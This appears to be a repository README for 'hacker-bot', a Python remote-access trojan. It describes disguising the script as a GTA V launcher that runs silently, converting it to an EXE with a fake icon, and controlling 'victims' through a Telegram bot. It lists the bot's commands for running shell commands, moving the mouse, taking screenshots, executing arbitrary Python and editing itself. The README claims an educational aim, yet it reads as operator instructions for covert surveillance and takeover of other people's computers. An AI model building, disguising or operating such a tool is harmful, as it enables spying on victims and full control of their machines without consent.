/hacker-bot

this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.

Primary LanguagePythonCreative Commons Zero v1.0 UniversalCC0-1.0

hacker-bot

this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.

by clicking on the bat file it will show the GTA V logo and run the script silently in the background.

you can convert this gta v.BAT to an EXE file and change its shortcut's icon.

after the script is run you can listen to victims in the telegram chat bot, who you put its token in main.py.

the goal of this repository is to education and protection!.

image

menu


to test :

hi --> this script is raning by the victim


to write a windows command :

$ ipconfig

$ time --> time : 16:11:00,73

$ ping 192.168.1.1


to control the mouse :

mouse x y --> mouse 90 90


click --> to click


screen --> to take screen


to show myself :

show --> (script)


to edit me :

edit (script) --> DONE!


to run python code :

rc with open("hack.txt", "a+") as f:

f.write("hacked!")

f.close


to close :

-exit

-$ taskkill /f /im pythonw.exe


My Project2